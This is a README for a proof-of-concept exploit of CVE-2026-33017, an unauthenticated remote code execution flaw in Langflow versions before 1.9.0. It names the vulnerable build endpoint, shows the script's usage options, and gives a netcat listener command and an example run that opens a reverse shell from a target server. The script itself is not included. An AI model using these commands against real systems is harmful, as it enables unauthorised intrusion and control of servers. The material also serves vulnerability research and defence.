## https://sploitus.com/exploit?id=175D8745-97F9-599A-A6A7-FF2597F0DC18
# CVE-2026-33017 - Langflow RCE Vulnerability
xpl0ited by [infrar3d](https://github.com/Infrar3dd)
This proof‑of‑concept exploit targets a critical Remote Code Execution (RCE) vulnerability in Langflow versions prior to 1.9.0. The vulnerability allows unauthenticated attackers to execute arbitrary system commands by injecting malicious Python code through the flow building API endpoint. The vulnerability exists in the ```/api/v1/build_public_tmp/{flow_id}/flow endpoint```, which improperly sanitizes user-supplied code in the code field of component templates.
### Usage:
```bash
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]
Langflow RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target base URL
-f, --flow FLOW Flow ID
-H, --host HOST Listener host for reverse shell
-P, --port PORT Listener port (default: 4444)
```
### Examples:
The first terminal (listener):
```bash
nc -lvnp 4444
```
The second terminal (exploit):
```bash
python3 CVE-2026-33017.py --url https://fireflowservice.example --flow abcd1234-efgh-5678-ijkl-9012mnop --host 10.10.10.10 --port 4444
```
### ⚠️ Disclaimer ⚠️
This software and proof-of-concept code is provided **for educational and research purposes only**.
* The authors are **not responsible** for any misuse or damage caused by this program.
* **Do not use** against any systems without explicit **prior permission**.
* Use of this tools for attacking targets without consent is **illegal**.
You are responsible for obeying all applicable laws. **Use ethically and responsibly.**